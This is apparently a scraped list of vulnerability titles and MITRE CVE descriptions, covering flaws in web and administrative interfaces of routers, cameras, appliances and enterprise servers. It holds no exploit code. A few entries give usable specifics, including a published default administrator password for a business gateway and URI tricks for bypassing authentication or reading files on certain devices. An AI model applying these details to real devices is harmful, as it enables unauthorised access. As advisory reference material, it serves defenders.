[1021] Novell GroupWise WebAccess /servlet/webacc weak authentication
[1020] Novell GroupWise WebAccess /servlet/webacc weak authentication
[915] McAfee VirusScan/WebShield/GroupShield ZIP Archive unknown vulnerability
[885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service
[831] BEA WebLogic up to 8.1 SP2 JNDI memory corruption
[783] Microsoft Exchange 5.5 Outlook Web Access HTML Redirection cross site scripting
[746] IBM Lotus Domino 6.x Web Access denial of service
[735] BEA WebLogic 7.0/8.3 role-name weak authentication
[715] BEA WebLogic 6.1/7.0/7.0.0.1/8.1 RMI via IIOP privilege escalation
[714] BEA WebLogic 8.1 SSL Connection denial of service
[705] Microsoft ISA Server 2000 SP2 Web Proxy denial of service
[704] Microsoft ISA Server 2000 SP2 Web Proxy privilege escalation
[703] Microsoft ISA Server 2000 SP2 Web Proxy denial of service
[696] Jamie Cameron Webmin up to 1.150 Administration denial of service
[693] IBM WebSphere denial of service
[687] Sambar Server 6.1 Sysadmin Web Site showini.asp directory traversal
[686] Sambar Server 6.1 Sysadmin Web Site showperf.asp cross site scripting
[660] Sun Solaris 8.0/9.0 SMC Webserver containing sendError directory traversal
[625] BEA WebLogic up to 8.1 SP2 Config Log File config.sh weak encryption
[624] BEA WebLogic 7.0/8.1 URL Filter /* privilege escalation
[623] BEA WebLogic 6.1/7.0/8.1 EJB Object privilege escalation
[613] BEA WebLogic 7.0/8.1 Custom Trust Manager administrator's weak authentication
[611] BEA WebLogic 7.0/7.0.0.1/8.1 administrator unknown vulnerability
[574] Trend Micro VirusWall up to 3.52 Build1466 on Windows /ishttpd/localweb/java/ directory traversal
[541] Symantec Firewall/VPN 100/200/200R Web Frontend Password weak encryption
[495] BEA WebLogic 6.1/7.0/8.1 Administration Server Console config.xml weak encryption
[494] BEA WebLogic up to 8.x SP2 Operators information disclosure
[493] BEA WebLogic 5.1/6.1/7.0/8.1 HTTP TRACE containing information disclosure
[492] BEA WebLogic 7.0 FAT Client Certificate Authentication weak authentication
[482] Symantec Web Security 2.5/3.0.0/3.0.1 Default Block Page cross site scripting
[479] Microsoft Exchange 2003 Outlook Web Access information disclosure
[475] BEA WebLogic up to 7.x JVM XML denial of service
[436] IBM WebSphere up to 5.0.2.1 Request DTD Attribute denial of service
[424] Sun ONE/iPlanet Web Server up to 4.1 SP12/6.0 SP5 denial of service
[419] Microsoft Exchange 2003 Outlook Web Access information disclosure
[400] Sun ONE Web Server 4.1/6.0 Log Entry unknown vulnerability
[395] BEA WebLogic up to 8.1 JNDI via RMI information disclosure
[394] BEA WebLogic up to 8.1 Node Manager denial of service
[393] BEA WebLogic 6.0/6.1/7.0.0.1/8.1 JMS Provider unknown vulnerability
[392] BEA WebLogic 6.0/6.1/7.0.0.1/8.1 T3 via SSL unknown vulnerability
[391] BEA WebLogic up to 8.1 Proxy Plugin denial of service
[334] Microsoft Exchange 5.5 Outlook Web Access cross site scripting
[267] AOL ICQ 2003a Build3777/2003a Build3799/2003a Build3800 Webfront Guestbook cross site scripting
[190] Microsoft IIS 6.0 Admin Interface weak authentication
[189] Microsoft IIS 6.0 Admin Interface weak authentication
[187] Microsoft IIS 6.0 Admin Interface cross site scripting
[86] Microsoft IIS 5.0/5.1 WebDAV denial of service
[15] Microsoft IIS 5.0 WebDav memory corruption
MITRE CVE - https://cve.mitre.org:
[CVE-2013-4785] The web interface for Dell iDRAC 6 firmware 1.7, and possibly other versions, allows remote attackers to modify the CLP interface for arbitrary users and possibly have other impact via a request to an unspecified form that is accessible from testurls.html.
[CVE-2013-4731] ajax.cgi in the web interface on the Choice Wireless Green Packet WIXFMR-111 4G WiMax modem allows remote attackers to execute arbitrary commands via shell metacharacters in the pip parameter in an Ajax tag_ipPing request, a different vulnerability than CVE-2013-3581.
[CVE-2013-4620] Cross-site scripting (XSS) vulnerability in interface/main/onotes/office_comments_full.php in OpenEMR 4.1.1 allows remote attackers to inject arbitrary web script or HTML via the note parameter.
[CVE-2013-3633] The web interface on Siemens Scalance X200 IRT switches with firmware before X-200IRT 5.1.0 relies on client-side privilege checks, which allows remote authenticated users to execute arbitrary commands via unspecified vectors.
[CVE-2013-3581] ajax.cgi in the web interface on the Choice Wireless Green Packet WIXFMR-111 4G WiMax modem allows remote attackers to obtain sensitive information via an Ajax (1) wmxState or (2) netState request.
[CVE-2013-3500] The Foundation webapp admin interface in GroundWork Monitor Enterprise 6.7.0 uses the nagios account as the owner of writable files under /usr/local/groundwork, which allows context-dependent attackers to bypass intended filesystem restrictions by leveraging access to a GroundWork script.
[CVE-2013-3457] Absolute path traversal vulnerability in the web interface in Cisco Finesse allows remote attackers to read directory contents via a direct request to a directory URL, aka Bug ID CSCug16772.
[CVE-2013-3440] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web interface in Cisco Unified Operations Manager allow remote attackers to inject arbitrary web script or HTML, and obtain improperly secured cookies, via unspecified vectors, aka Bug ID CSCud80186.
[CVE-2013-3428] The web interface in Cisco Secure Access Control System (ACS) does not properly suppress error-condition details, which allows remote authenticated users to obtain sensitive information via an unspecified request that triggers an error, aka Bug ID CSCue65957.
[CVE-2013-3423] Cross-site scripting (XSS) vulnerability in the web interface in Cisco Secure Access Control System (ACS) allows remote attackers to inject arbitrary web script or HTML via an unspecified field, aka Bug ID CSCud75174.
[CVE-2013-3380] The administrative web interface in the Access Control Server in Cisco Secure Access Control System (ACS) does not properly restrict the report view page, which allows remote authenticated users to obtain sensitive information via a direct request, aka Bug ID CSCue79279.
[CVE-2013-3080] VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remote authenticated users to create or overwrite arbitrary files, and consequently execute arbitrary code or cause a denial of service, by leveraging Virtual Appliance Management Interface (VAMI) web-interface access.
[CVE-2013-2560] Directory traversal vulnerability in the web interface on Foscam devices with firmware before 11.37.2.49 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI, as demonstrated by discovering (1) web credentials or (2) Wi-Fi credentials.
[CVE-2013-1611] Multiple cross-site scripting (XSS) vulnerabilities in administrative-interface pages in the management console in Symantec Brightmail Gateway 9.5.x allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1185] The web interface in the Manager component in Cisco Unified Computing System (UCS) 1.x and 2.x before 2.0(2m) allows remote attackers to obtain sensitive information by reading a (1) technical-support bundle file or (2) on-device configuration backup, aka Bug ID CSCtq86543.
[CVE-2013-1153] Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
[CVE-2013-0944] The web-based file-restore interface in EMC Avamar Server before 6.1.0 allows remote authenticated users to read arbitrary files via a crafted URL.
[CVE-2013-0673] Directory traversal vulnerability in the web interface in the Health Monitor service in MatrikonOPC A&E Historian 1.0.0.0 allows remote attackers to read and delete arbitrary files via a crafted URL.
[CVE-2013-0134] Cross-site scripting (XSS) vulnerability in the web interface in AirDroid allows remote attackers to inject arbitrary web script or HTML via a crafted text message that is transmitted by a managed phone.
[CVE-2013-0124] Multiple cross-site scripting (XSS) vulnerabilities in the administration interface in ASKIA askiaweb allow remote attackers to inject arbitrary web script or HTML via the (1) Number or (2) UpdatePage parameter to WebProd/cgi-bin/AskiaExt.dll.
[CVE-2013-0123] Multiple SQL injection vulnerabilities in the administration interface in ASKIA askiaweb allow remote attackers to execute arbitrary SQL commands via (1) the nHistoryId parameter to WebProd/pages/pgHistory.asp or (2) the OrderBy parameter to WebProd/pages/pgadmin.asp.
[CVE-2013-0120] The web interface on Dell PowerConnect 6248P switches allows remote attackers to cause a denial of service (device crash) via a malformed request.
[CVE-2012-6339] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web interface in Cerberus FTP Server before 5.0.6.0 allow (1) remote attackers to inject arbitrary web script or HTML via a log entry that is not properly handled within the Log Manager component, and might allow (2) remote authenticated administrators to inject arbitrary web script or HTML via a Messages field to the servermanager program.
[CVE-2012-6276] Directory traversal vulnerability in the web-based management interface on the TP-LINK TL-WR841N router with firmware 3.13.9 build 120201 Rel.54965n and earlier allows remote attackers to read arbitrary files via the URL parameter.
[CVE-2012-5942] Cross-site scripting (XSS) vulnerability in the Data Management Portal Web User Interface in IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.2.x before 7.2.1.4 allows remote authenticated users to inject content, and conduct phishing attacks, via unspecified vectors.
[CVE-2012-5939] Cross-site scripting (XSS) vulnerability in Welcome.do in the Data Management Portal Web User Interface in IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.2.x before 7.2.1.4 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL.
[CVE-2012-5767] Unspecified vulnerability in the web interface on the IBM TS3500 Tape Library with firmware before C260 allows remote authenticated users to gain privileges via unspecified vectors.
[CVE-2012-5758] The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and 2.1.0.0 through 2.1.0.2 does not require authentication for an unspecified interface, which allows remote attackers to cause a denial of service (process exit) via unknown vectors.
[CVE-2012-5519] CUPS 1.4.4, when running in certain Linux distributions such as Debian GNU/Linux, stores the web interface administrator key in /var/run/cups/certs/0 using certain permissions, which allows local users in the lpadmin group to read or write arbitrary files as root by leveraging the web interface.
[CVE-2012-5058] Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to the Web interface.
[CVE-2012-5053] Cross-site scripting (XSS) vulnerability in the Receiver Web User Interface on Trimble Infrastructure GNSS Series Receivers NetR3, NetR5, NetR8, and NetR9 before 4.70, and NetRS before 1.3-2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4970] Cross-site scripting (XSS) vulnerability in the web management interface on Polycom HDX Video End Points with UC APL software before 2.7.1.1_J, and commercial software before 3.0.5, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4950] Cross-site scripting (XSS) vulnerability in the Keyword Search page in the web interface in Pattern Insight 2.3 allows remote attackers to inject arbitrary web script or HTML via crafted characters that are not properly handled during construction of error messages.
[CVE-2012-4939] Cross-site scripting (XSS) vulnerability in IPAMSummaryView.aspx in the IPAM web interface before 3.0-HotFix1 in SolarWinds Orion Network Performance Monitor might allow remote attackers to inject arbitrary web script or HTML via the "Search for an IP address" field.
[CVE-2012-4938] Cross-site scripting (XSS) vulnerability in the web interface in Pattern Insight 2.3 allows remote authenticated administrators to inject arbitrary web script or HTML via the banner message.
[CVE-2012-4937] Session fixation vulnerability in the web interface in Pattern Insight 2.3 allows remote attackers to hijack web sessions via a jsession_id cookie.
[CVE-2012-4936] The web interface in Pattern Insight 2.3 allows remote attackers to conduct clickjacking attacks via a FRAME element.
[CVE-2012-4935] Cross-site request forgery (CSRF) vulnerability in the web interface in Pattern Insight 2.3 allows remote attackers to hijack the authentication of arbitrary users.
[CVE-2012-4839] The OSLC interface in the Web Client (aka CQ Web) in IBM Rational ClearQuest 7.1.2.x before 7.1.2.9 and 8.0.0.x before 8.0.0.5 allows remote attackers to conduct phishing attacks via a FRAME element.
[CVE-2012-4609] The web interface in EMC RSA NetWitness Informer before 2.0.5.6 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
[CVE-2012-4608] Cross-site request forgery (CSRF) vulnerability in the web interface in EMC RSA NetWitness Informer before 2.0.5.6 allows remote attackers to hijack the authentication of arbitrary users.
[CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
[CVE-2012-4493] Cross-site scripting (XSS) vulnerability in the administrative interface in the Better Revisions module 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with the "administer better revisions" permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4484] Cross-site scripting (XSS) vulnerability in the administrative interface in the Campaign Monitor module before 6.x-2.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4019] Cross-site scripting (XSS) vulnerability in tokyo_bbs.cgi in Come on Girls Interface (CGI) Tokyo BBS allows remote attackers to inject arbitrary web script or HTML via vectors related to the error page.
[CVE-2012-3580] Symantec Messaging Gateway (SMG) before 10.0 allows remote authenticated users to modify the web application by leveraging access to the management interface.
[CVE-2012-3503] The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.
[CVE-2012-3414] Cross-site scripting (XSS) vulnerability in swfupload.swf in SWFUpload 2.2.0.1 and earlier, as used in WordPress before 3.3.2, TinyMCE Image Manager 1.1, and other products, allows remote attackers to inject arbitrary web script or HTML via the movieName parameter, related to the "ExternalInterface.call" function.
[CVE-2012-3367] Red Hat Certificate System (RHCS) before 8.1.1 and Dogtag Certificate System does not properly check certificate revocation requests made through the web interface, which allows remote attackers with permissions to revoke end entity certificates to revoke the Certificate Authority (CA) certificate.
[CVE-2012-3138] Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Web interface.
[CVE-2012-3076] The administrative web interface on Cisco TelePresence Recording Server before 1.8.0 allows remote authenticated users to execute arbitrary commands via unspecified vectors, aka Bug ID CSCth85804.
[CVE-2012-3075] The administrative web interface on Cisco TelePresence Immersive Endpoint Devices before 1.7.4 allows remote authenticated users to execute arbitrary commands via a malformed request on TCP port 443, aka Bug ID CSCtn99724.
[CVE-2012-3002] The web interface on (1) Foscam and (2) Wansview IP cameras allows remote attackers to bypass authentication, and perform administrative functions or read the admin password, via a direct request to an unspecified URL.
[CVE-2012-2999] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface in Cerberus FTP Server before 5.0.5.0 allow remote attackers to hijack the authentication of administrators for requests that (1) add a user account or (2) reconfigure the state of the FTP service, as demonstrated by a request to usermanager/users/modify.
[CVE-2012-2974] The web interface on the SMC SMC8024L2 switch allows remote attackers to bypass authentication and obtain administrative access via a direct request to a .html file under (1) status/, (2) system/, (3) ports/, (4) trunks/, (5) vlans/, (6) qos/, (7) rstp/, (8) dot1x/, (9) security/, (10) igmps/, or (11) snmp/.
[CVE-2012-2963] The administrative interface in the embedded web server on the BreakingPoint Storm appliance before 3.0 does not require authentication for the gwt/BugReport script, which allows remote attackers to obtain sensitive information by downloading a .tgz file.
[CVE-2012-2955] Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allow remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2012-2604] Multiple cross-site scripting (XSS) vulnerabilities in GuestAccess.jsp in the Guest/Contractor access component in the administrative interface in Bradford Network Sentry before 5.3.3 allow remote authenticated users to inject arbitrary web script or HTML via unspecified fields.
[CVE-2012-2564] Multiple cross-site request forgery (CSRF) vulnerabilities in the administrative interface in Bloxx Web Filtering before 5.0.14 allow remote attackers to hijack the authentication of administrators for requests that perform administrative actions.
[CVE-2012-2440] The default configuration of the TP-Link 8840T router enables web-based administration on the WAN interface, which allows remote attackers to establish an HTTP connection and possibly have unspecified other impact via unknown vectors.
[CVE-2012-2439] The default configuration of the NETGEAR ProSafe FVS318N firewall enables web-based administration on the WAN interface, which allows remote attackers to establish an HTTP connection and possibly have unspecified other impact via unknown vectors.
[CVE-2012-1838] The web management interface on the LG-Nortel ELO GS24M switch allows remote attackers to bypass authentication, and consequently obtain cleartext credential and configuration information, via a direct request to a configuration web page.
[CVE-2012-1239] The TopAccess web-based management interface on TOSHIBA TEC e-Studio multi-function peripheral (MFP) devices with firmware 30x through 302, 35x through 354, and 4xx through 421 allows remote attackers to bypass authentication and obtain administrative privileges via unspecified vectors.
[CVE-2012-1034] Multiple cross-site scripting (XSS) vulnerabilities in the admin interface in EPiServer CMS through 6R2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1025] Absolute path traversal vulnerability in file in Enigma2 Webinterface 1.6.0 through 1.6.8, 1.6rc3, and 1.7.0 allows remote attackers to read arbitrary files via a full pathname in the file parameter.
[CVE-2012-1024] Directory traversal vulnerability in file in Enigma2 Webinterface 1.5rc1 and 1.5beta4 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
[CVE-2012-0460] Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 do not properly restrict write access to the window.fullScreen object, which allows remote attackers to spoof the user interface via a crafted web page.
[CVE-2012-0410] Directory traversal vulnerability in WebAccess in Novell GroupWise before 8.03 allows remote attackers to read arbitrary files via the User.interface parameter.
[CVE-2012-0363] The web interface on Cisco SRP 520 series devices with firmware before 1.1.26 and SRP 520W-U and 540 series devices with firmware before 1.2.4 allows remote authenticated users to execute arbitrary commands via unspecified vectors, related to a "command injection vulnerability," aka Bug ID CSCtt46871.
[CVE-2012-0340] Cross-site scripting (XSS) vulnerability in the management interface on the Cisco IronPort Encryption Appliance with software before 6.5.3 allows remote attackers to inject arbitrary web script or HTML via the header parameter to the default URI under admin/, aka bug ID 72410.
[CVE-2011-5102] The Investigative Reports web interface in the TRITON management console in Websense Web Security 7.1 before Hotfix 109, 7.1.1 before Hotfix 06, 7.5 before Hotfix 78, 7.5.1 before Hotfix 12, 7.6 before Hotfix 24, and 7.6.2 before Hotfix 12
[CVE-2011-5100] The web interface in McAfee Firewall Reporter before 5.1.0.13 does not properly implement cookie authentication, which allows remote attackers to obtain access, and disable anti-virus functionality, via an HTTP request.
[CVE-2011-5078] The web administration interface in the server in Sybase M-Business Anywhere 6.7 before ESD# 3 and 7.0 before ESD# 7 does not require admin authentication for unspecified scripts, which allows remote authenticated users to list or delete user accounts, modify passwords, or read log files via HTTP requests, aka Bug IDs 678497 and 678499.
[CVE-2011-4837] Cross-site request forgery (CSRF) vulnerability in /ctrl in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to hijack the authentication of admins for requests that execute arbitrary programs.
[CVE-2011-4836] Cross-site scripting (XSS) vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to inject arbitrary web script or HTML via a request for a crafted URI.
[CVE-2011-4835] Directory traversal vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to access arbitrary files via unspecified vectors.
[CVE-2011-4788] Absolute path traversal vulnerability in the web interface on HP StorageWorks P2000 G3 MSA array systems allows remote attackers to read arbitrary files via a pathname in the URI.
[CVE-2011-4782] Cross-site scripting (XSS) vulnerability in libraries/config/ConfigFile.class.php in the setup interface in phpMyAdmin 3.4.x before 3.4.9 allows remote attackers to inject arbitrary web script or HTML via the host parameter.
[CVE-2011-4707] Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet.
[CVE-2011-4436] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web interface on the Dell KACE K2000 System Deployment Appliance allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4346] Cross-site scripting (XSS) vulnerability in the web interface in Red Hat Network (RHN) Satellite 5.4.1 allows remote authenticated users to inject arbitrary web script or HTML via the Description field of the asset tag in a Custom Info page.
[CVE-2011-4064] Cross-site scripting (XSS) vulnerability in the setup interface in phpMyAdmin 3.4.x before 3.4.6 allows remote attackers to inject arbitrary web script or HTML via a crafted value.
[CVE-2011-4005] Cross-site request forgery (CSRF) vulnerability in the Services Ready Platform Configuration Utility web interface on the Cisco Small Business SRP521W, SRP526W, and SRP527W with firmware before 1.1.24 and the Small Business SRP541W, SRP546W, and SRP547W with firmware before 1.2.1 allows remote attackers to hijack the authentication of administrators for requests that execute arbitrary commands, aka Bug ID CSCtr45124.
[CVE-2011-3294] Cross-site scripting (XSS) vulnerability in the login page in the administrative interface on Cisco TelePresence Video Communication Servers (VCS) with software before X7.0 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header, aka Bug ID CSCts80342.
[CVE-2011-3206] Multiple cross-site scripting (XSS) vulnerabilities in the administration interface in RHQ 4.2.0, as used in JBoss Operations Network (aka JON or JBoss ON) before 3.0, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2763] The web interface on the LifeSize Room appliance LS_RM1_3.5.3 (11) and 4.7.18 allows remote attackers to execute arbitrary commands via a modified request to the LSRoom_Remoting.doCommand function in gateway.php.
[CVE-2011-2762] The web interface on the LifeSize Room appliance LS_RM1_3.5.3 (11) allows remote attackers to bypass authentication via unspecified data associated with a "true" authentication status, related to AMF data and the LSRoom_Remoting.authenticate function in gateway.php.
[CVE-2011-2547] The web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote authenticated users to execute arbitrary commands via crafted parameters to web forms, aka Bug ID CSCtq65681.
[CVE-2011-2546] SQL injection vulnerability in the web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtq65669.
[CVE-2011-2544] Cross-site scripting (XSS) vulnerability in the web interface in Cisco TelePresence System MXP Series F9.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via a crafted Call ID, as demonstrated by resultant cross-site request forgery (CSRF) attacks that change passwords or cause a denial of service, aka Bug ID CSCtq46488.
[CVE-2011-2468] Directory traversal vulnerability in the web interface in AnyMacro Mail System G4X allows remote attackers to read arbitrary files via directory traversal sequences in a request.
[CVE-2011-2078] Multiple cross-site scripting (XSS) vulnerabilities in the New Atlanta BlueDragon administrative interface in MediaCAST 8 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1913] SQL injection vulnerability in the login form in the web interface in Mercator SENTINEL 2.0 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2011-1904] An unspecified function in the web interface in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to execute arbitrary commands via unknown vectors, related to a "command injection" issue.
[CVE-2011-1902] Directory traversal vulnerability in the web interface in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to read arbitrary files via unspecified vectors.
[CVE-2011-1901] The mail-filter web interface in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to bypass authentication via unspecified vectors.
[CVE-2011-1647] The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote attackers to read the private key for the admin SSL certificate via unspecified vectors, aka Bug ID CSCtn23871.
[CVE-2011-1646] The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote authenticated users to execute arbitrary commands via the (1) ping test parameter or (2) traceroute test parameter, aka Bug ID CSCtn23871.
[CVE-2011-1645] The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote attackers to read the backup configuration file, and consequently execute arbitrary code, via unspecified vectors, aka Bug ID CSCtn23871.
[CVE-2011-1559] Unspecified vulnerability in the IBM Web Interface for Content Management (aka WEBi) 1.0.4 before FP3 has unknown impact and attack vectors.
[CVE-2011-1558] Multiple cross-site scripting (XSS) vulnerabilities in the IBM Web Interface for Content Management (aka WEBi) 1.0.4 before FP3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-1242.
[CVE-2011-1372] The Web User Interface on the IBM TS3100 and TS3200 tape libraries with firmware before A.60 allows remote attackers to bypass authentication and obtain administrative access via unspecified vectors.
[CVE-2011-0951] The web-based management interface in Cisco Secure Access Control System (ACS) 5.1 before 5.1.0.44.6 and 5.2 before 5.2.0.26.3 allows remote attackers to change arbitrary user passwords via unspecified vectors, aka Bug ID CSCtl77440.
[CVE-2011-0886] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic.
[CVE-2011-0885] A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface.
[CVE-2011-0551] Cross-site request forgery (CSRF) vulnerability in the Web Interface in the Endpoint Protection Manager in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.6300 allows remote attackers to hijack the authentication of administrators for requests that create administrative accounts.
[CVE-2011-0550] Multiple cross-site scripting (XSS) vulnerabilities in the Web Interface in the Endpoint Protection Manager in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.6300 allow remote attackers to inject arbitrary web script or HTML via (1) the token parameter to portal/Help.jsp or (2) the URI in a console/apps/sepm request.
[CVE-2011-0388] Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x do not properly restrict remote access to the Java servlet RMI interface, which allows remote attackers to cause a denial of service (memory consumption and web outage) via multiple crafted requests, aka Bug IDs CSCtg35830 and CSCtg35825.
[CVE-2011-0387] The administrative web interface on Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote authenticated users to cause a denial of service or have unspecified other impact via vectors involving access to a servlet, aka Bug ID CSCtf97164.
[CVE-2011-0385] The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065.
[CVE-2011-0352] Buffer overflow in the web-based management interface on the Cisco Linksys WRT54GC router with firmware before 1.06.1 allows remote attackers to cause a denial of service (device crash) via a long string in a POST request.
[CVE-2011-0344] Multiple stack-based buffer overflows in unspecified CGI programs in the Unified Maintenance Tool web interface in the embedded web server in the Communication Server (CS) in Alcatel-Lucent OmniPCX Enterprise before R9.0 H1.301.50 allow remote attackers to execute arbitrary code via crafted HTTP headers.
[CVE-2011-0050] Cross-site scripting (XSS) vulnerability in the nonjs interface (interfaces/nonjs.pm) in CGI:IRC before 0.5.10 allows remote attackers to inject arbitrary web script or HTML via the R parameter.
[CVE-2011-0049] Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
[CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
[CVE-2010-4762] Cross-site scripting (XSS) vulnerability in the rich-text-editor component in Open Ticket Request System (OTRS) before 3.0.0-beta2 allows remote authenticated users to inject arbitrary web script or HTML by using the "source code" feature in the customer interface.
[CVE-2010-4733] WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463.
[CVE-2010-4515] Cross-site scripting (XSS) vulnerability in Citrix Web Interface 5.0, 5.1, and 5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-6477 and CVE-2009-2454.
[CVE-2010-4412] Multiple cross-site scripting (XSS) vulnerabilities in pfSense 2 beta 4 allow remote attackers to inject arbitrary web script or HTML via (1) the id parameter in an olsrd.xml action to pkg_edit.php, (2) the xml parameter to pkg.php, or the if parameter to (3) status_graph.php or (4) interfaces.php, a different vulnerability than CVE-2008-1182 and CVE-2010-4246.
[CVE-2010-4304] The web interface in Cisco Unified Videoconferencing (UVC) System 3545, 5110, 5115, and 5230
[CVE-2010-4232] The web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to bypass authentication via a // (slash slash) at the beginning of a URI, as demonstrated by the //system.html URI.
[CVE-2010-4231] Directory traversal vulnerability in the web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
